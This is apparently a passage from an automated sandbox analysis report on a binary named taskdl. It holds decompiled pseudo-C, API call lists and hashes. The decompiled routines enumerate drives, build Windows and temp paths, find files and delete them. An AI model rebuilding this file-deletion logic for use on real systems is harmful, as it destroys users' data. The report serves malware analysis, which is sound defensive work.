                                                      • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(00000000), ref: 004011B6
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 004011E7
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 004011F6
                                                      • FindClose.KERNEL32(00000000), ref: 00401205
                                                      • DeleteFileW.KERNEL32(?), ref: 0040123A
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401258
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401282
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3015229018.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000A.00000002.3015183023.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 0000000A.00000002.3015270257.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 0000000A.00000002.3015310361.0000000000404000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
                                                      Similarity
                                                      • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@wcslen$FileFind$swprintf$CloseDeleteDirectoryEos@?$basic_string@FirstGrow@?$basic_string@NextPathTempWindows
                                                      • String ID:
                                                      • API String ID: 2889739147-0
                                                      • Opcode ID: d094fdb74faa2036a2288d1d3d1a61125983eed402f55e78df214a8260d1f803
                                                      • Instruction ID: c02e7cbfb6260119d7520a8cc5a4b78e5b9d8733a8a6b2d1cbf059c3021fc26b
                                                      • Opcode Fuzzy Hash: d094fdb74faa2036a2288d1d3d1a61125983eed402f55e78df214a8260d1f803
                                                      • Instruction Fuzzy Hash: E551C3716043419FD720DF64C884B9BB7E9FBC8348F044A2EF589B32D1D6789945CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 71%
                                                      			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                      				CHAR* _v8;
                                                      				intOrPtr* _v24;
                                                      				intOrPtr _v28;
                                                      				struct _STARTUPINFOA _v96;
                                                      				int _v100;
                                                      				char** _v104;
                                                      				int _v108;
                                                      				void _v112;
                                                      				char** _v116;
                                                      				intOrPtr* _v120;
                                                      				intOrPtr _v124;
                                                      				void* _t27;
                                                      				intOrPtr _t36;
                                                      				signed int _t38;
                                                      				int _t40;
                                                      				intOrPtr* _t41;
                                                      				intOrPtr _t42;
                                                      				intOrPtr _t49;
                                                      				intOrPtr* _t55;
                                                      				intOrPtr _t58;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x4020a8);
                                                      				_push(0x401a7c);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t58;
                                                      				_v28 = _t58 - 0x68;
                                                      				_v8 = 0;
                                                      				__set_app_type(2);
                                                      				 *0x403084 =  *0x403084 | 0xffffffff;
                                                      				 *0x403088 =  *0x403088 | 0xffffffff;
                                                      				 *(__p__fmode()) =  *0x403080;
                                                      				 *(__p__commode()) =  *0x40307c;
                                                      				 *0x40308c = _adjust_fdiv;
                                                      				_t27 = E00401A7B( *_adjust_fdiv);
                                                      				if( *0x403070 == 0) {
                                                      					__setusermatherr(E00401A78);
                                                      				}
                                                      				E00401A66(_t27);
                                                      				_push(0x40300c);
                                                      				_push(0x403008);
                                                      				L00401A60();
                                                      				_v112 =  *0x403078;
                                                      				__getmainargs( &_v100,  &_v116,  &_v104,  *0x403074,  &_v112);
                                                      				_push(0x403004);
                                                      				_push(0x403000);
                                                      				L00401A60();
                                                      				_t55 =  *_acmdln;
                                                      				_v120 = _t55;
                                                      				if( *_t55 != 0x22) {
                                                      					while( *_t55 > 0x20) {
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      					}
                                                      				} else {
                                                      					do {
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      						_t42 =  *_t55;
                                                      					} while (_t42 != 0 && _t42 != 0x22);
                                                      					if( *_t55 == 0x22) {
                                                      						L6:
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      					}
                                                      				}
                                                      				_t36 =  *_t55;
                                                      				if(_t36 != 0 && _t36 <= 0x20) {
                                                      					goto L6;
                                                      				}
                                                      				_v96.dwFlags = 0;
                                                      				GetStartupInfoA( &_v96);
                                                      				if((_v96.dwFlags & 0x00000001) == 0) {
                                                      					_t38 = 0xa;
                                                      				} else {
                                                      					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                      				}
                                                      				_push(_t38);
                                                      				_push(_t55);
                                                      				_push(0);
                                                      				_push(GetModuleHandleA(0));
                                                      				_t40 = E004012C0();
                                                      				_v108 = _t40;
                                                      				exit(_t40); // executed
                                                      				_t41 = _v24;
                                                      				_t49 =  *((intOrPtr*)( *_t41));
                                                      				_v124 = _t49;
                                                      				_push(_t41);
                                                      				_push(_t49);
                                                      				L00401A5A();
                                                      				return _t41;
                                                      			}


                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3015229018.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000A.00000002.3015183023.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 0000000A.00000002.3015270257.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 0000000A.00000002.3015310361.0000000000404000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
                                                      Similarity
                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                      • String ID:
                                                      • API String ID: 801014965-0
                                                      • Opcode ID: 4015c31cfa7eab49e8c51e62fd741af3e0d2f81cb378811d4cbcafae977c22e0
                                                      • Instruction ID: 68ab6ae738ded19f39d0610043d4fcd1ea5deb11ceedb7bb579f538117b6dbca
                                                      • Opcode Fuzzy Hash: 4015c31cfa7eab49e8c51e62fd741af3e0d2f81cb378811d4cbcafae977c22e0
                                                      • Instruction Fuzzy Hash: 42417EB5901344EFDB209FA4DA49A6ABFB8EB09715F20023FF581B72E1D6784940CF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 58 4012c0-4012db GetLogicalDrives 59 4012e0-401303 58->59 60 401305-40130f GetDriveTypeW 59->60 61 40131e-401322 59->61 60->61 62 401311-40131c call 401080 Sleep 60->62 61->59 63 401324-40132d 61->63 62->61
                                                      C-Code - Quality: 100%
                                                      			E004012C0() {
                                                      				intOrPtr _v4;
                                                      				short _v8;
                                                      				unsigned int _t8;
                                                      				int _t13;
                                                      				unsigned int _t15;
                                                      				signed int _t21;
                                                      				short* _t23;
                                                      
                                                      				_t23 =  &_v8;
                                                      				_t8 = GetLogicalDrives(); // executed
                                                      				_t15 = _t8;
                                                      				_t21 = 0x19;
                                                      				do {
                                                      					_v8 =  *0x403060;
                                                      					_v4 =  *0x403064;
                                                      					_t3 = _t21 + 0x41; // 0x5a
                                                      					_v8 = _t3;
                                                      					if((_t15 >> _t21 & 0x00000001) != 0) {
                                                      						_t13 = GetDriveTypeW( &_v8); // executed
                                                      						if(_t13 != 4) {
                                                      							E00401080(_t21);
                                                      							_t23 =  &(_t23[2]);
                                                      							Sleep(0xa); // executed
                                                      						}
                                                      					}
                                                      					_t21 = _t21 - 1;
                                                      				} while (_t21 >= 2);
                                                      				return 0;
                                                      			}


                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 004012C7
                                                      • GetDriveTypeW.KERNELBASE(?,?,?,?,00000000,?,0000000A), ref: 0040130A
                                                        • Part of subcall function 00401080: swprintf.MSVCRT(?,00403040,?,00403050,76E83300,00000000), ref: 004010F5
                                                        • Part of subcall function 00401080: FindFirstFileW.KERNELBASE(?,?), ref: 00401107
                                                      • Sleep.KERNELBASE(0000000A,00000000,?,0000000A), ref: 0040131C
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3015229018.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000A.00000002.3015183023.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 0000000A.00000002.3015270257.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 0000000A.00000002.3015310361.0000000000404000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
                                                      Similarity
                                                      • API ID: DriveDrivesFileFindFirstLogicalSleepTypeswprintf
                                                      • String ID:
                                                      • API String ID: 570308627-0
                                                      • Opcode ID: fac8c12e3c7440fa081a6b1de2581f42964eb1eb3cef597a2f435b430f1423df
                                                      • Instruction ID: 4c7b1852939095ad3804a53ba97627e403d947e7219eb0394d6b0875d80bfcc1
                                                      • Opcode Fuzzy Hash: fac8c12e3c7440fa081a6b1de2581f42964eb1eb3cef597a2f435b430f1423df
                                                      • Instruction Fuzzy Hash: D9F0C8756043044BD310DF18ED4065B77A5EB99354F00053EED45B3390D776990DC6AA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,77045320,00000000,00000000,?,?), ref: 004016EE
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,77045320,00000000,00000000,?,?), ref: 004016F6
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
                                                      • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,77045320,00000000,00000000,?), ref: 00401779
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,77045320,00000000,00000000), ref: 004017BA
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3015229018.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000A.00000002.3015183023.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 0000000A.00000002.3015270257.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 0000000A.00000002.3015310361.0000000000404000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
                                                      Similarity
                                                      • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                                      • String ID:
                                                      • API String ID: 2613176527-0
                                                      • Opcode ID: d8cc844e41db627e1c4436b7b7a073ec45db5ac64ec8fc819127fe6e53c62420
                                                      • Instruction ID: b735bfb2d4c14645f341b606901ad4f9af47e45cc28c7d2ea722b83d512bfbf9
                                                      • Opcode Fuzzy Hash: d8cc844e41db627e1c4436b7b7a073ec45db5ac64ec8fc819127fe6e53c62420
                                                      • Instruction Fuzzy Hash: 81410275300B008FC720DF19DAC4A6AB7E6FB89710B14897EE5569B7A0CB79AC01CB48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 96 401000-401020 GetWindowsDirectoryW 97 401022-40103c GetTempPathW wcslen 96->97 98 40105e-401070 swprintf 96->98 99 401073-401077 97->99 100 40103e-40104a wcslen 97->100 98->99 100->99 101 40104c-40105d wcslen 100->101
                                                      C-Code - Quality: 100%
                                                      			E00401000(intOrPtr _a4, wchar_t* _a8) {
                                                      				wchar_t* _t11;
                                                      				wchar_t* _t22;
                                                      
                                                      				_t22 = _a8;
                                                      				GetWindowsDirectoryW(_t22, 0x104);
                                                      				_t11 = _a4 + 0x41;
                                                      				if(0 != _t11) {
                                                      					swprintf(_t22, 0x403010, _t11, 0x403020);
                                                      					goto L5;
                                                      				} else {
                                                      					GetTempPathW(0x104, _t22);
                                                      					if(wcslen(_t22) <= 0 ||  *((short*)(_t22 + wcslen(_t22) * 2 - 2)) != 0x5c) {
                                                      						L5:
                                                      						return _t22;
                                                      					} else {
                                                      						 *((short*)(_t22 + wcslen(_t22) * 2 - 2)) = 0;
                                                      						return _t22;
                                                      					}
                                                      				}
                                                      			}






                                                      APIs
                                                      • GetWindowsDirectoryW.KERNEL32(00000019,00000104,76E80F00,00000019,004010D5,?,?,76E80F00,00000019,76E83300,00000000), ref: 0040100C
                                                      • GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
                                                      • wcslen.MSVCRT ref: 00401035
                                                      • wcslen.MSVCRT ref: 0040103F
                                                      • wcslen.MSVCRT ref: 0040104D
                                                      • swprintf.MSVCRT(00000019,00403010,?,00403020), ref: 0040106A
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3015229018.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000A.00000002.3015183023.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 0000000A.00000002.3015270257.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 0000000A.00000002.3015310361.0000000000404000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
                                                      Similarity
                                                      • API ID: wcslen$DirectoryPathTempWindowsswprintf
                                                      • String ID:
                                                      • API String ID: 30654359-0
                                                      • Opcode ID: 4e66369f8c42ca16cc11ceda3156b996b8b268552c228e5f165bda1afb4dc665
                                                      • Instruction ID: 00ede0775e497762771a1e7050bb3ecf99d0a0070f097ddb1d391ed7ba2ca3cf
                                                      • Opcode Fuzzy Hash: 4e66369f8c42ca16cc11ceda3156b996b8b268552c228e5f165bda1afb4dc665
                                                      • Instruction Fuzzy Hash: ADF0C87170122067E7206B2CBD0AE9F77A8EF85315B01403AF786B62D0D2B55A5586EE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 102 4013d0-4013ec 103 4013f2-4013f7 102->103 104 40152b-401538 102->104 107 401404 103->107 108 4013f9-401402 103->108 105 4015e7-4015e9 104->105 106 40153e-40154e 104->106 109 401682-401689 105->109 110 4015ef-401600 105->110 111 401550 106->111 112 40157c-40158c 106->112 113 401406-401408 107->113 108->107 108->113 114 401602-401614 call 401690 110->114 115 40161e-401627 110->115 116 401554-401572 call 401690 111->116 119 4015a6-4015ad 112->119 120 40158e-40159c call 401690 112->120 117 40140a-40140c 113->117 118 40140e-401410 113->118 140 401616-40161a 114->140 125 401629-401645 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z 115->125 126 40164f-401656 115->126 141 401574-401578 116->141 127 401413-40141b 117->127 118->127 121 4015b3-4015cb ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z 119->121 122 40167f 119->122 137 40159e-4015a2 120->137 121->121 129 4015cd-4015e4 121->129 122->109 125->125 132 401647-40164b 125->132 126->122 133 401658 126->133 134 40141d 127->134 135 40141f-40143e ??2@YAPAXI@Z 127->135 132->126 142 40165c-401675 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z 133->142 134->135 138 401440-401456 call 401690 135->138 139 401458-40145c 135->139 137->119 138->139 145 40147e-40148f 139->145 146 40145e 139->146 140->115 141->112 142->142 143 401677-40167b 142->143 143->122 149 401491 145->149 150 4014b5-4014bd 145->150 148 401462-40147c call 401690 146->148 148->145 152 401495-4014b3 call 401690 149->152 153 4014d0-4014f1 call 4018d0 150->153 154 4014bf-4014ce ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z 150->154 152->150 160 4014f3-401509 153->160 161 40150c-401528 153->161 154->153 154->154
                                                      C-Code - Quality: 57%
                                                      			E004013D0(signed int __ecx) {
                                                      				signed int _t67;
                                                      				signed int _t68;
                                                      				signed int _t73;
                                                      				signed int _t77;
                                                      				signed int _t78;
                                                      				signed int _t79;
                                                      				intOrPtr _t81;
                                                      				intOrPtr _t91;
                                                      				intOrPtr _t95;
                                                      				intOrPtr _t98;
                                                      				signed int _t99;
                                                      				intOrPtr _t101;
                                                      				signed int _t104;
                                                      				intOrPtr _t105;
                                                      				signed int _t106;
                                                      				intOrPtr _t107;
                                                      				intOrPtr _t108;
                                                      				intOrPtr _t116;
                                                      				intOrPtr _t119;
                                                      				intOrPtr _t121;
                                                      				signed int _t127;
                                                      				intOrPtr _t135;
                                                      				signed int _t136;
                                                      				void* _t139;
                                                      				intOrPtr _t140;
                                                      				void* _t141;
                                                      				void* _t142;
                                                      				intOrPtr _t143;
                                                      				intOrPtr _t144;
                                                      				void* _t146;
                                                      				signed int _t147;
                                                      				intOrPtr _t148;
                                                      				signed int _t149;
                                                      				signed int _t151;
                                                      				intOrPtr _t152;
                                                      				signed int _t153;
                                                      				intOrPtr _t154;
                                                      				intOrPtr _t155;
                                                      				intOrPtr _t156;
                                                      				signed int _t157;
                                                      				intOrPtr _t158;
                                                      				signed int _t159;
                                                      				void* _t160;
                                                      				void* _t161;
                                                      
                                                      				_t109 = __ecx;
                                                      				_t144 =  *((intOrPtr*)(__ecx + 8));
                                                      				_t136 =  *(_t160 + 0x24);
                                                      				_t67 =  *((intOrPtr*)(__ecx + 0xc)) - _t144 >> 4;
                                                      				 *(_t160 + 0x10) = __ecx;
                                                      				if(_t67 >= _t136) {
                                                      					_t104 =  *(_t160 + 0x20);
                                                      					if(_t144 - _t104 >> 4 >= _t136) {
                                                      						if(_t136 > 0) {
                                                      							_t68 = _t136 << 4;
                                                      							_t139 = _t144 - _t68;
                                                      							_t156 = _t144;
                                                      							 *(_t160 + 0x20) = _t68;
                                                      							if(_t139 == _t144) {
                                                      								L37:
                                                      								_t140 =  *((intOrPtr*)(_t109 + 8));
                                                      								_t146 = _t140 - _t68;
                                                      								if(_t104 == _t146) {
                                                      									L40:
                                                      									_t141 = _t68 + _t104;
                                                      									_t147 = _t104;
                                                      									if(_t104 == _t141) {
                                                      										goto L44;
                                                      									}
                                                      									_t105 =  *((intOrPtr*)(_t160 + 0x28));
                                                      									do {
                                                      										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t105, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
                                                      										_t147 = _t147 + 0x10;
                                                      									} while (_t147 != _t141);
                                                      									_t109 =  *(_t160 + 0x10);
                                                      									_t68 =  *(_t160 + 0x20);
                                                      									goto L44;
                                                      								} else {
                                                      									goto L38;
                                                      								}
                                                      								do {
                                                      									L38:
                                                      									_t146 = _t146 - 0x10;
                                                      									_t140 = _t140 - 0x10;
                                                      									__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t146, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
                                                      								} while (_t146 != _t104);
                                                      								_t109 =  *(_t160 + 0x10);
                                                      								_t68 =  *(_t160 + 0x20);
                                                      								goto L40;
                                                      							} else {
                                                      								goto L35;
                                                      							}
                                                      							do {
                                                      								L35:
                                                      								E00401690(__ecx, _t156, _t139);
                                                      								_t139 = _t139 + 0x10;
                                                      								_t160 = _t160 + 8;
                                                      								_t156 = _t156 + 0x10;
                                                      							} while (_t139 != _t144);
                                                      							_t109 =  *(_t160 + 0x10);
                                                      							_t68 =  *(_t160 + 0x20);
                                                      							goto L37;
                                                      						}
                                                      						return _t67;
                                                      					} else {
                                                      						_t157 = _t104;
                                                      						_t68 = _t136 << 4;
                                                      						 *(_t160 + 0x20) = _t68;
                                                      						_t127 = _t68 + _t104;
                                                      						if(_t104 != _t144) {
                                                      							 *(_t160 + 0x24) = _t127;
                                                      							do {
                                                      								E00401690(_t109,  *(_t160 + 0x24), _t157);
                                                      								_t116 =  *((intOrPtr*)(_t160 + 0x2c));
                                                      								_t157 = _t157 + 0x10;
                                                      								_t160 = _t160 + 8;
                                                      								_t109 = _t116 + 0x10;
                                                      								 *(_t160 + 0x24) = _t116 + 0x10;
                                                      							} while (_t157 != _t144);
                                                      							_t68 =  *(_t160 + 0x20);
                                                      							_t109 =  *(_t160 + 0x10);
                                                      						}
                                                      						_t148 =  *((intOrPtr*)(_t109 + 8));
                                                      						_t158 =  *((intOrPtr*)(_t160 + 0x28));
                                                      						_t142 = _t136 - (_t148 - _t104 >> 4);
                                                      						if(_t142 != 0) {
                                                      							do {
                                                      								E00401690(_t109, _t148, _t158);
                                                      								_t160 = _t160 + 8;
                                                      								_t148 = _t148 + 0x10;
                                                      								_t142 = _t142 - 1;
                                                      							} while (_t142 != 0);
                                                      							_t68 =  *(_t160 + 0x20);
                                                      							_t109 =  *(_t160 + 0x10);
                                                      						}
                                                      						_t143 =  *((intOrPtr*)(_t109 + 8));
                                                      						_t149 = _t104;
                                                      						if(_t104 == _t143) {
                                                      							L44:
                                                      							 *((intOrPtr*)(_t109 + 8)) =  *((intOrPtr*)(_t109 + 8)) + _t68;
                                                      							return _t68;
                                                      						} else {
                                                      							goto L31;
                                                      						}
                                                      						do {
                                                      							L31:
                                                      							__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t158, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
                                                      							_t149 = _t149 + 0x10;
                                                      						} while (_t149 != _t143);
                                                      						_t115 =  *(_t160 + 0x10);
                                                      						_t73 =  *(_t160 + 0x20);
                                                      						 *((intOrPtr*)(_t115 + 8)) =  *((intOrPtr*)( *(_t160 + 0x10) + 8)) + _t73;
                                                      						return _t73;
                                                      					}
                                                      				} else {
                                                      					_t117 =  *((intOrPtr*)(__ecx + 4));
                                                      					if(_t117 == 0) {
                                                      						L3:
                                                      						_t77 = _t136;
                                                      					} else {
                                                      						_t77 = _t144 - _t117 >> 4;
                                                      						if(_t136 >= _t77) {
                                                      							goto L3;
                                                      						}
                                                      					}
                                                      					if(_t117 != 0) {
                                                      						_t151 = _t144 - _t117 >> 4;
                                                      					} else {
                                                      						_t151 = 0;
                                                      					}
                                                      					_t78 = _t77 + _t151;
                                                      					 *(_t160 + 0x14) = _t78;
                                                      					if(_t78 < 0) {
                                                      						_t78 = 0;
                                                      					}
                                                      					_t79 = _t78 << 4;
                                                      					_push(_t79);
                                                      					L004018F0();
                                                      					_t159 =  *(_t160 + 0x14);
                                                      					 *(_t160 + 0x1c) = _t79;
                                                      					_t106 = _t79;
                                                      					_t152 =  *((intOrPtr*)(_t159 + 4));
                                                      					_t161 = _t160 + 4;
                                                      					if(_t152 !=  *(_t160 + 0x24)) {
                                                      						do {
                                                      							E00401690(_t117, _t106, _t152);
                                                      							_t101 =  *((intOrPtr*)(_t161 + 0x28));
                                                      							_t152 = _t152 + 0x10;
                                                      							_t161 = _t161 + 8;
                                                      							_t106 = _t106 + 0x10;
                                                      						} while (_t152 != _t101);
                                                      					}
                                                      					_t153 = _t106;
                                                      					if(_t136 > 0) {
                                                      						 *(_t161 + 0x24) = _t136;
                                                      						do {
                                                      							_t117 =  *((intOrPtr*)(_t161 + 0x28));
                                                      							E00401690( *((intOrPtr*)(_t161 + 0x28)), _t153,  *((intOrPtr*)(_t161 + 0x28)));
                                                      							_t98 =  *((intOrPtr*)(_t161 + 0x2c));
                                                      							_t161 = _t161 + 8;
                                                      							_t153 = _t153 + 0x10;
                                                      							_t99 = _t98 - 1;
                                                      							 *(_t161 + 0x24) = _t99;
                                                      						} while (_t99 != 0);
                                                      					}
                                                      					_t154 =  *((intOrPtr*)(_t161 + 0x20));
                                                      					_t81 = (_t136 << 4) + _t106;
                                                      					_t107 =  *((intOrPtr*)(_t159 + 8));
                                                      					if(_t154 != _t107) {
                                                      						 *((intOrPtr*)(_t161 + 0x20)) = _t81;
                                                      						do {
                                                      							_t81 = E00401690(_t117,  *((intOrPtr*)(_t161 + 0x20)), _t154);
                                                      							_t121 =  *((intOrPtr*)(_t161 + 0x28));
                                                      							_t154 = _t154 + 0x10;
                                                      							_t161 = _t161 + 8;
                                                      							_t117 = _t121 + 0x10;
                                                      							 *((intOrPtr*)(_t161 + 0x20)) = _t121 + 0x10;
                                                      						} while (_t154 != _t107);
                                                      					}
                                                      					_t108 =  *((intOrPtr*)(_t159 + 8));
                                                      					_t155 =  *((intOrPtr*)(_t159 + 4));
                                                      					while(_t155 != _t108) {
                                                      						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
                                                      						_t155 = _t155 + 0x10;
                                                      					}
                                                      					E004018D0(_t81,  *((intOrPtr*)(_t159 + 4)));
                                                      					_t135 =  *((intOrPtr*)(_t161 + 0x1c));
                                                      					_t119 =  *((intOrPtr*)(_t159 + 4));
                                                      					 *((intOrPtr*)(_t159 + 0xc)) = ( *(_t161 + 0x18) << 4) + _t135;
                                                      					if(_t119 != 0) {
                                                      						 *((intOrPtr*)(_t159 + 4)) = _t135;
                                                      						_t91 = (( *((intOrPtr*)(_t159 + 8)) - _t119 >> 4) + _t136 << 4) + _t135;
                                                      						 *((intOrPtr*)(_t159 + 8)) = _t91;
                                                      						return _t91;
                                                      					} else {
                                                      						 *((intOrPtr*)(_t159 + 4)) = _t135;
                                                      						_t95 = (_t136 << 4) + _t135;
                                                      						 *((intOrPtr*)(_t159 + 8)) = _t95;
                                                      						return _t95;
                                                      					}
                                                      				}
                                                      			}
















































                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00401423
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?), ref: 004014C3
                                                      • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,77045320,00000000,00000000,?,?,00000001,?), ref: 004015C0
                                                      • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,77045320,00000000,00000000,?,?,00000001,?), ref: 0040163D
                                                      • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,77045320,00000000,00000000,?,?,00000001,?), ref: 0040166A
                                                        • Part of subcall function 00401690: ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,77045320,00000000,00000000,?,?), ref: 004016EE
                                                        • Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,77045320,00000000,00000000,?,?), ref: 004016F6
                                                        • Part of subcall function 00401690: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
                                                        • Part of subcall function 00401690: ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
                                                        • Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3015229018.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000A.00000002.3015183023.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 0000000A.00000002.3015270257.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 0000000A.00000002.3015310361.0000000000404000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_taskdl.jbxd
                                                      Similarity
